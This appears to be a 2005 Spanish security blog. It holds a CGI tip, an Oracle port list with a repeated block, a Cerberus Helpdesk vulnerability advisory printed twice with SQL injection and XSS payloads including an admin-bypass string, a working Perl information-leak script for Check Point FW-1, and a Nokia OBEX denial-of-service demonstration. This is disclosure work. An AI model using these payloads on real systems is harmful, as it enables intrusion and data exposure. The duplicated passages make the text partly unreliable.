martes, 27 de diciembre de 2005

(8)Exec format error

En la ejecucion de un CGI que esta en el cgi-bin

Posibles causas:

* No tiene bien puesta la cabecera tipica de #!/bin/sh #!/usr/bin/perl ...
* dos2unix es tu amigo (aka tr -d '15')

miércoles, 21 de diciembre de 2005

Oracle Port Usage (Sorted by Port Number)


http://osi.oracle.com/CollaborationSuite9041/doc/install/ports.htm


21 Oracle Files - FTP (default value)
110 Oracle Email - POP
119 Oracle Email - NNTP
139 Oracle Files - SMB
389 LDAP (Oracle Internet Directory)
548 Oracle Files - AFP
563 Oracle Email NNTP- SSL
636 Oracle Internet Directory- SSL
995 Oracle Email POP- SSL
1521 Oracle Workflow - TNS
1748 Oracle Enterprise Manager Intelligent Agent
1754 Oracle Enterprise Manager Intelligent Agent
1808 Oracle Enterprise Manager Intelligent Agent
1809 Oracle Enterprise Manager Intelligent Agent
1810 Oracle Enterprise Manager Application Server Service
1811 Oracle Enterprise Manager Application Server Service
1950 Oracle9iAS Reports Services SQL*Net
2049 Oracle Files - NFS (default value)
2070 Oracle9iAS Syndication Server (OSS); To access OSS
3001 Oracle9iAS Containers for J2EE - AJP
3101 Oracle9iAS Containers for J2EE - RMI
3201 Oracle9iAS Containers for J2EE - JMS
3301 Oracle9iAS Containers for J2EE HTTP Listener
4000 Oracle9iAS Web Cache Administration Port
4001 Oracle9iAS Web Cache Invalidation Port
4002 Oracle9iAS Web Cache Statistics
4031 Oracle Internet Directory SSL
4032 Oracle Internet Directory non-SSL
4443 Oracle HTTP Server- SSL, Oracle HTTP Server Listen- SSL, Oracle9iAS Web Cache Listen- SSL
4444 Oracle HTTP Server Listen- SSL if Oracle9iAS Web Cache is installed and configured
5000 Oracle9iAS Single Sign-On
5100 Oracle Email
5730 Oracle Calendar
5731 Oracle Calendar
5732 Oracle Calendar
5734 Oracle Calendar server manager
6003 Oracle HTTP Server- Oracle Notification Service Request Port
6100 Oracle HTTP Server- Oracle Notification Service Local Port
6200 Oracle HTTP Server- Oracle Notification Service Remote Port
6666 Oracle9iAS Clickstream Collector Agent
6675 Oracle9iAS Clickstream Collector Server
6676 Oracle9iAS Clickstream Execution Engine
7000 Oracle HTTP Server Java Object Cache
7771 Oracle Management Server
7772 Oracle Management Server
7773 Oracle Management Server
7777 Oracle HTTP Server- non-SSL, Oracle HTTP Server Listen- non-SSL, Oracle9iAS Web Cache Listen-non-SSL
7778 Oracle HTTP Server Listen- non-SSL if Oracle9iAS Web Cache is installed and configured
8007 Oracle HTTP Server JServ Servlet Engine
4444 Oracle HTTP Server Listen- SSL if Oracle9iAS Web Cache is installed and configured
5000 Oracle9iAS Single Sign-On
5100 Oracle Email
5730 Oracle Calendar
5731 Oracle Calendar
5732 Oracle Calendar
5734 Oracle Calendar server manager
6003 Oracle HTTP Server- Oracle Notification Service Request Port
6100 Oracle HTTP Server- Oracle Notification Service Local Port
6200 Oracle HTTP Server- Oracle Notification Service Remote Port
6666 Oracle9iAS Clickstream Collector Agent
6675 Oracle9iAS Clickstream Collector Server
6676 Oracle9iAS Clickstream Execution Engine
7000 Oracle HTTP Server Java Object Cache
7771 Oracle Management Server
7772 Oracle Management Server
7773 Oracle Management Server
7777 Oracle HTTP Server- non-SSL, Oracle HTTP Server Listen- non-SSL, Oracle9iAS Web Cache Listen-non-SSL
7778 Oracle HTTP Server Listen- non-SSL if Oracle9iAS Web Cache is installed and configured
8007 Oracle HTTP Server JServ Servlet Engine
9000 Oracle9iAS Wireless PIM Notification Dispatcher
14000 Oracle9iAS Reports Services Visigenics - CORBA
16001 IIOP
53000 range Oracle Files Domain Controller and Nodes
53000 range Oracle Files Main Node
53000 range Oracle Files HTTP Node

domingo, 18 de diciembre de 2005

Cerberus Helpdesk multiple vulnerabilities.

Title: Cerberus Helpdesk multiple vulnerabilities.
Severity: Medium
Affected: cerberus-gui (2.649), support-center (2.6493.2.0pr2)
Problem type: remote


Description:
-------------------------------------------------------------------------------

Cerberus Helpdesk is a WebGroup Media helpdesk suite based in php enviroment.
Official webpage: http://www.cerberusweb.com/



Details:
-------------------------------------------------------------------------------

support-center:
*******************************

SQL injection in attachment_send.php (line 112):
You can download files from other users or use blind sql injection attacks:
Example url:
.../support-center/cerberus-support-center/attachment_send.php?file_id=N [SQL] &thread_id=1
CODE:
$sql = "SELECT part_content FROM thread_attachments_parts WHERE file_id = $file_id";

XSS:
http://server/support-center/index.php?mod_id=2&kb_ask=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E



cerberus-gui (parser-related):
*******************************

There are few sql injections if XML is malicious generated:

SQL injections in email_parser.php:

Function: "is_queue_address" (line: 1397) doesn.t check properly the "$addy" value.
CODE:
$sql = sprintf("SELECT q.queue_name, q.queue_mode, q.queue_email_display_name, ".
"qa.queue_addresses_id, qa.queue_id, qa.queue_address, ".
"qa.queue_domain, q.queue_prefix, q.queue_response_open, ".
"q.queue_send_open, q.queue_response_gated ".
"FROM queue_addresses qa ".
"LEFT JOIN queue q USING (queue_id) ".
"WHERE LOWER(qa.queue_address) = '%s' ".
"AND LOWER(qa.queue_domain) = '%s'",
strtolower($mailbox),
strtolower($domain)

Function: "is_banned_address" (line: 752) doesn.t check "$address" properly.
CODE:
SELECT a.address_banned FROM address a WHERE a.address_address = '".$address."'";

Function: "is_admin_address" (line 1532) you can bypass this function using, as an email address, the following query: "'OR'u.user_superuser'='1'--".
Example of result of this query:
SELECT u.user_id FROM user u WHERE u.user_email != '' AND u.user_email = '' OR u.user_superuser = '1'
CODE:
SELECT u.user_id FROM user u WHERE u.user_email != '' AND u.user_email = '$address'";


SQL injection in structs.php:
Function: "cer_email_address_struct" (line: 167) doesn.t check the following query.
CODE:
$sql = "SELECT a.address_id,a.address_banned FROM address a WHERE a.address_address = '" . $a_address . "'";


cerberus-gui:
*******************************

SQL injection in cer_KnowledgebaseHandler.class.php:
Function: "_load_article_details" (line 270), you can fetch "superuser" md5 password with blind sql injection.
Example URL:
/cerberus-gui/knowledgebase.php?mode=view_entry&root=2&sid=c7bb6a0d5f83d61d75053c85c14af247&kbid=4 [SQL]
CODE:
$sql = "SELECT k.kb_id, k.kb_entry_date, k.kb_public, k.kb_category_id, k.kb_keywords, kp.kb_problem_summary, kp.kb_problem_text, kp.kb_problem_text_is_html, " .
" ks.kb_solution_text, ks.kb_solution_text_is_html, kc.kb_category_name, u.user_login As entry_user, k.kb_avg_rating, k.kb_rating_votes " .
" FROM knowledgebase k LEFT JOIN knowledgebase_problem kp ON (kp.kb_id=k.kb_id) LEFT JOIN knowledgebase_solution ks on (ks.kb_id=k.kb_id) ".
" LEFT JOIN knowledgebase_categories kc ON (kc.kb_category_id=k.kb_category_id) LEFT JOIN user u ON (k.kb_entry_user=u.user_id) " .
" WHERE k.kb_id = " . $kbid;


SQL injection in "addresses_export.php":
Example URL:
POST: /cerberus-gui/addresses_export.php
sid=c61ce82aa50569705dd774c33644446c&queues%5B%5D=[SQL]&delimiter=comma&file_type=screen&form_submit=x
CODE:
$sql = "SELECT DISTINCT a.address_address FROM ticket t LEFT JOIN thread th ON (t.min_thread_id=th.thread_id)
LEFT JOIN address a ON (th.thread_address_id=a.address_id) WHERE t.ticket_queue_id IN ($queues) ORDER BY a.address_address ASC;";

SQL injection in "display.php". "$thread" is not checked
CODE:
$sql = "SELECT th.thread_address_id, a.address_address FROM thread th LEFT JOIN address a ON (th.thread_address_id = a.address_id) ".
"WHERE th.thread_id = " . $thread;

SQL injection in "display_ticket_thread.php" (line 52).
Example URL:
/cerberus-gui/display_ticket_thread.php?type=comment&sid=a640d024f84be01320aacb0ec6c87d74&ticket=[SQL]
CODE:
$sql = "SELECT t.ticket_id, t.ticket_subject, t.ticket_status, t.ticket_date, t.ticket_assigned_to_id, t.ticket_queue_id, t.ticket_priority, th.thread_address_id, ad.address_address, t.queue_addresses_id, q.queue_name " .
"FROM ticket t, thread th, address ad, queue q " .
"WHERE t.ticket_queue_id IN ($u_qids) AND th.ticket_id = t.ticket_id AND t.ticket_queue_id = q.queue_id AND th.thread_address_id = ad.address_id AND t.ticket_id = " . $ticket . " GROUP BY th.thread_id LIMIT 0,1";


Solution:
-------------------------------------------------------------------------------
Not available, maybe changing every "$cerberus_db->query($sql)" to "$cerberus_db->escape($sql)".


History:
-------------------------------------------------------------------------------
15-20/Nov/2005 --- Bugs discovered
11/Dec/2005 --- The Author has been notified .
19/Dec/2005 --- Full disclosure

Cerberus Helpdesk multiple vulnerabilities.

Title: Cerberus Helpdesk multiple vulnerabilities.
Severity: Medium
Affected: cerberus-gui (2.649), support-center (2.6493.2.0pr2)
Problem type: remote


Description:
-------------------------------------------------------------------------------

Cerberus Helpdesk is a WebGroup Media helpdesk suite based in php enviroment.
Official webpage: http://www.cerberusweb.com/



Details:
-------------------------------------------------------------------------------

support-center:
*******************************

SQL injection in attachment_send.php (line 112):
You can download files from other users or use blind sql injection attacks:
Example url:
.../support-center/cerberus-support-center/attachment_send.php?file_id=N [SQL] &thread_id=1
CODE:
$sql = "SELECT part_content FROM thread_attachments_parts WHERE file_id = $file_id";

XSS:
http://server/support-center/index.php?mod_id=2&kb_ask=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E



cerberus-gui (parser-related):
*******************************

There are few sql injections if XML is malicious generated:

SQL injections in email_parser.php:

Function: "is_queue_address" (line: 1397) doesn.t check properly the "$addy" value.
CODE:
$sql = sprintf("SELECT q.queue_name, q.queue_mode, q.queue_email_display_name, ".
"qa.queue_addresses_id, qa.queue_id, qa.queue_address, ".
"qa.queue_domain, q.queue_prefix, q.queue_response_open, ".
"q.queue_send_open, q.queue_response_gated ".
"FROM queue_addresses qa ".
"LEFT JOIN queue q USING (queue_id) ".
"WHERE LOWER(qa.queue_address) = '%s' ".
"AND LOWER(qa.queue_domain) = '%s'",
strtolower($mailbox),
strtolower($domain)

Function: "is_banned_address" (line: 752) doesn.t check "$address" properly.
CODE:
SELECT a.address_banned FROM address a WHERE a.address_address = '".$address."'";

Function: "is_admin_address" (line 1532) you can bypass this function using, as an email address, the following query: "'OR'u.user_superuser'='
1'--".
Example of result of this query:
SELECT u.user_id FROM user u WHERE u.user_email != '' AND u.user_email = '' OR u.user_superuser = '1'
CODE:
SELECT u.user_id FROM user u WHERE u.user_email != '' AND u.user_email = '$address'";


SQL injection in structs.php:
Function: "cer_email_address_struct" (line: 167) doesn.t check the following query.
CODE:
$sql = "SELECT a.address_id,a.address_banned FROM address a WHERE a.address_address = '" . $a_address . "'";


cerberus-gui:
*******************************

SQL injection in cer_KnowledgebaseHandler.class.php:
Function: "_load_article_details" (line 270), you can fetch "superuser" md5 password with blind sql injection.
Example URL:
/cerberus-gui/knowledgebase.php?mode=view_entry&root=2&sid=c7bb6a0d5f83d61d75053c85c14af247&kbid=4 [SQL]
CODE:
$sql = "SELECT k.kb_id, k.kb_entry_date, k.kb_public, k.kb_category_id, k.kb_keywords, kp.kb_problem_summary, kp.kb_problem_text, kp.kb_p
roblem_text_is_html, " .
" ks.kb_solution_text, ks.kb_solution_text_is_html, kc.kb_category_name, u.user_login As entry_user, k.kb_avg_rating, k.kb_rating_votes "
.
" FROM knowledgebase k LEFT JOIN knowledgebase_problem kp ON (kp.kb_id=k.kb_id) LEFT JOIN knowledgebase_solution ks on (ks.kb_id=k.kb_id)
".
" LEFT JOIN knowledgebase_categories kc ON (kc.kb_category_id=k.kb_category_id) LEFT JOIN user u ON (k.kb_entry_user=u.user_id) " .
" WHERE k.kb_id = " . $kbid;


SQL injection in "addresses_export.php":
Example URL:
POST: /cerberus-gui/addresses_export.php
sid=c61ce82aa50569705dd774c33644446c&queues%5B%5D=[SQL]&delimiter=comma&file_type=screen&form_submit=x
CODE:
$sql = "SELECT DISTINCT a.address_address FROM ticket t LEFT JOIN thread th ON (t.min_thread_id=th.thread_id)
LEFT JOIN address a ON (th.thread_address_id=a.address_id) WHERE t.ticket_queue_id IN ($queues) ORDER BY a.address_address ASC;";

SQL injection in "display.php". "$thread" is not checked
CODE:
$sql = "SELECT th.thread_address_id, a.address_address FROM thread th LEFT JOIN address a ON (th.thread_address_id = a.address_id) ".
"WHERE th.thread_id = " . $thread;

SQL injection in "display_ticket_thread.php" (line 52).
Example URL:
/cerberus-gui/display_ticket_thread.php?type=comment&sid=a640d024f84be01320aacb0ec6c87d74&ticket=[SQL]
CODE:
$sql = "SELECT t.ticket_id, t.ticket_subject, t.ticket_status, t.ticket_date, t.ticket_assigned_to_id, t.ticket_queue_id, t.ticket_priori
ty, th.thread_address_id, ad.address_address, t.queue_addresses_id, q.queue_name " .
"FROM ticket t, thread th, address ad, queue q " .
"WHERE t.ticket_queue_id IN ($u_qids) AND th.ticket_id = t.ticket_id AND t.ticket_queue_id = q.queue_id AND th.thread_address_id = ad.add
ress_id AND t.ticket_id = " . $ticket . " GROUP BY th.thread_id LIMIT 0,1";


Solution:
-------------------------------------------------------------------------------
Not available, maybe changing every "$cerberus_db->query($sql)" to "$cerberus_db->escape($sql)".


History:
-------------------------------------------------------------------------------
15-20/Nov/2005 --- Bugs discovered
11/Dec/2005 --- The Author has been notified .
19/Dec/2005 --- Full disclosure

Blind SQL Injection PoC Tool.

He desarrollado un script basandome en el codigo de ilo- (www.reversing.org),
que realiza brute force en webs que tengan algun fallo de inyección de SQL ciega

Tambien he publicado unos fallos con los que he probado la herramienta, asi como
un video donde se ve como funciona...

Además hacktimes va a publicar un articulo sobre blind sql injection con
más información.

bsqlbf.pl: script
bsqlbf.avi: video


martes, 13 de diciembre de 2005

Get private address from fw-1 (old bug)

#!/usr/bin/perl
# Wed Dec 14 01:44:29 CET 2005
# Get private address from fw-1, nothing new, only a working port.
# ref: http://www.securityfocus.com/bid/8524/info
# !dSR www.digitalsec.es

use strict;
use IO::Socket;

my ($bytes, $host, @hosts) = ();
my $sock = new IO::Socket::INET(PeerAddr => $ARGV[0], PeerPort => 256,
Proto => 'tcp') or die "ERROR! $!\n";
print $sock "\x31\x00\x00\x00";
print $sock "\x00\x00\x00\x0C\x00\x00\x00\x04\xD4\xA3\x9F\x02";
while() { $bytes .= unpack("H*",$_); }
print "fw1 string: $bytes\n";
print substr ($bytes, 16)."\n";
my $i = 0;
foreach ((substr $bytes, 16) =~/(.{8})/g) {
$host = ();
foreach my $ip (/(.{2})/g) {
$host .= hex($ip).".";
} $host =~ s/\.$//;
last if $host =~ /0\.0\.0/; push(@hosts, $host);
}
foreach (@hosts) { $i++; print "ipaddr[$i]: $_\n"; }

download pl





Nokia 7610, 3650 Denial of Service in OBEX.

Severity: Low
Affected: tested in nokia 7610 and nokia 3650 (maybe others symbian
phones).
Problem type: remote

Details:
--------------------------------------------------------------------------------
--------------------------

They are some flaw in the OBEX implementation in nokia 7610 (V4.0.437
15-09-04 RH51), and others, that disable this service if you send
archive with name ":" or "\".

----
Quote of IROBEX12.pdf Pag:40, section 4.3 -- (OBEX specification)

"Pushing objects into the inbox Objects are pushed into the inbox by using
the PUT command with a Name header. The string in the Name header
should not contain any path characters such as ':', '/' or '\'. Objects with
improperly formed names should be rejected."
----

The device ask for PIN if you are not paired or ask if you want accept a
connection of the remote box, you need ACCEPT. It have low risk ,
becouse dont work if you dont accept the incoming connection.

If connection is established, the file is sended and they arent "New
message arrived" message, like when you send correct archive. Its ok,
the filename is dropped.

The problem is the OBEX service dont work anymore after this, if you
tried to send other file or from some vcard from other device, you cant
connect to the remote OBEX service again.

Demostration with Linux as client:


jim:~# hcitool scan
Scanning ...
00:13:70:5E:1F:01 7610


jim:~# obexftp -b 00:13:70:5E:1F:01 -p \:
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT 1
cli_sync_request()
obexftp_sync()
client_done()
client_done() Found connection number: -1022384746
client_done() Sender identified
obexftp_sync() OBEX_HandleInput = 31
obexftp_sync() Done success=1
done
Sending ":"... obexftp_put_file() Sending : -> :
build_object_from_file() Lastmod = 2005-09-18T00:16:42Z
cli_sync_request()
cli_fillstream_from_file()
cli_fillstream_from_file() Read 6 bytes
cli_fillstream_from_file()
cli_fillstream_from_file() Read 0 bytes
obexftp_sync()
obexftp_sync() OBEX_HandleInput = 0
failed: :
obexftp_cli_disconnect()
Disconnecting...cli_sync_request()
failed: disconnect
obexftp_cli_close()

# Error pushing other file after send ":" filename:

jim:~# obexftp -b 00:13:70:5E:1F:01 -p /etc/hosts
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
--------------------------------------------------------------------------------
--------------------------

Timeline:
20 Sept 2005: bug found.
21 Sept 2005: Nokia security contacted.
24 Sept 2005: Disclosure in NCN - V congress (http://www.noconname.org).
26 Sept 2005: Full disclosure.


dab @ !dSR
http://www.digitalsec.net